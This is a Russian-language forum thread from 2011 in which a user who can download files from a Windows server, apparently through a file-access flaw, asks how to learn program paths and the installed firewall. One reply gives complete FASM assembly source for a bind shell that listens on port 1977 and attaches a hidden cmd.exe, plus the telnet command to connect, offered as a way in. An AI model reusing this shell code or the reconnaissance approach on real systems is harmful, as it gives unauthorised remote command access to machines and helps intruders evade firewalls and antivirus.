пути к программам

Тема в разделе "WASM.SOFTWARE", создана пользователем x86, 4 дек 2011.

  1. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    Откуда их можно узнать? скажем, у меня есть возможность скачивать любые файлы со своего сервера Windows server, смотреть список файлов в любой папке, но сами папки не вижу.
    Наверняка где то записывается какие программы где установлены?
     
  2. Sholar

    Sholar New Member

    Публикаций:
    0
    Регистрация:
    16 окт 2011
    Сообщения:
    189
    FindFirstFile/FindNextFile?
     
  3. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    ага а как я загружу это на сервер и запущу? могу только скачивать и видеть файлы в директориях.
     
  4. Sholar

    Sholar New Member

    Публикаций:
    0
    Регистрация:
    16 окт 2011
    Сообщения:
    189
    Чего? Кажется мы друг друга не понимаем. Зачем тебе что-то загружать на сервер и запускать? Ты же отправляешь серверу команду "показать_содержимое_такой-то_папки", он смотрит какие файлы там лежат и выдает тебе результат. Или я нифига не понял о чем ты спрашиваешь :)
     
  5. Sholar

    Sholar New Member

    Публикаций:
    0
    Регистрация:
    16 окт 2011
    Сообщения:
    189
    А стоп стоп! Невнимательно прочитал первый пост. Включи там удаленный рабочий стол и все дела.
     
  6. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    файлы то выдает, а папки не показывает. Например на диске C вижу только это

    AUTOEXEC.BAT
    bootfont.bin
    boot.ini
    pagefile.sys
    ntldr
    NTDETECT.COM
    MSDOS.SYS
    IO.SYS
    CONFIG.SYS

    Узнать имя пользователя можно из логов WindowsUpdate в c:\windows\, а дальше?
     
  7. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    Как бы нет доступа в целях эксперимента.
     
  8. Magnum

    Magnum New Member

    Публикаций:
    0
    Регистрация:
    29 дек 2007
    Сообщения:
    925
    x86
    Полный путь в вашем случае есть сетевой путь.
    Где конкретно находится файл на диске - сервер вам не покажет и показывать не должен. Все организованно так, что данную информацию получить вы не можете.
     
  9. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    Я знаю что файл лежит рядом с программой, мне же нужно узнать путь до этой программы. Я знаю что для этой проги есть правило в фаерволле, и это правило наверно можно скачать как в PC Tools firewall. Еще из логов WindowsUpdate что папке windows я знаю имя пользователя чтобы зайти в C:\Documents and Settings\ИМЯ\. Неужели из всего этого нельзя что то сделать?
     
  10. _sheva740

    _sheva740 New Member

    Публикаций:
    0
    Регистрация:
    31 авг 2005
    Сообщения:
    1.539
    Адрес:
    Poland
    x86
    Предположительно у тебя есть доступ в расшаренную папку на удал машине.
    Твоя задача просмотреть содержимое всех дисков на этой удаленной машине.
    Предположительно на удал машине нет фаервола и антивиря.
    Ты свободно запускаешь там сетевые приложение которой откроет заданный сетевой порт.
    Тогда дорога тебе в сторону bindshell- ов товарищ (как там КПРФ кстати еще не победил?)
    Предположительно ты пишешь на fasm-е.
    Тогда на удаленном сервере из-под терминала запускаешь прогу дающую тебе твой shell.
    Код (Text):
    1. format pe gui
    2. entry x
    3.  
    4. include 'win32ax.inc'
    5.  
    6. section ''code import writeable readable executable
    7.  
    8. library kernel32,'kernel32',ws2_32,'ws2_32'
    9.  
    10. import kernel32,CreateProcess,'CreateProcessA'
    11. import ws2_32,WSAStartup,'WSAStartup',WSASocket,'WSASocketA',htons,'htons',htonl,'htonl',bind,'bind',listen,'listen',accept,'accept'
    12.  
    13. x:
    14. invoke WSAStartup,0202h,a
    15. invoke WSASocket,2,1,6,0,0,0
    16. mov [b],eax
    17. mov [c.sin_family],2
    18. invoke htons,1977
    19. mov [c.sin_port],ax
    20. invoke htonl,0
    21. mov [c.sin_addr],eax
    22. invoke bind,[b],c,sizeof.sockaddr_in
    23. invoke listen,[b],1
    24. invoke accept,[b],c,d
    25. mov [e.cb],sizeof.STARTUPINFO
    26. mov [e.wShowWindow],0
    27. mov [e.dwFlags],STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES
    28. mov [e.hStdInput],eax
    29. mov [e.hStdOutput],eax
    30. mov [e.hStdError],eax
    31. mov [e.lpTitle],0
    32. mov [e.lpReserved2],0
    33. invoke CreateProcess,0,'cmd',0,0,TRUE,0,0,0,e,f
    34. ret
    35.  
    36. a WSADATA
    37. b dd 0
    38. c sockaddr_in
    39. d dd sizeof.sockaddr_in
    40. e STARTUPINFO
    41. f PROCESS_INFORMATION
    Потом пересаживаешься на свою машину и запускаешь ...
    Код (Text):
    1. telnet IP_сервера 1977 [Enter]
    Теперь ты получил командную строку с удаленного сервера. Далее шагаешь по папкам с помощью команды "cd" и "dir".
    Говоришь тут дядям "Спасибо!!!" ... и идешь разбираться с подробностями )))
     
  11. x86

    x86 New Member

    Публикаций:
    0
    Регистрация:
    31 май 2011
    Сообщения:
    9
    Не, нету, и залить туда ничего пока не могу. Чтобы залить этот код мне надо скачать тот файлик. Файрволл и антивирус есть, должны быть по крайней мере.
    Тогда как узнать какой там фаерволл? Может по списку драйверов можно понять?

    Вот список:
     
  12. valterg

    valterg Active Member

    Публикаций:
    0
    Регистрация:
    19 авг 2004
    Сообщения:
    2.105
    ТОлько ярлык на Рабочем столе, если он есть. Файлы реестра не дают читать.
    Стандартные проги имеют стандартные пути для установки. Это все.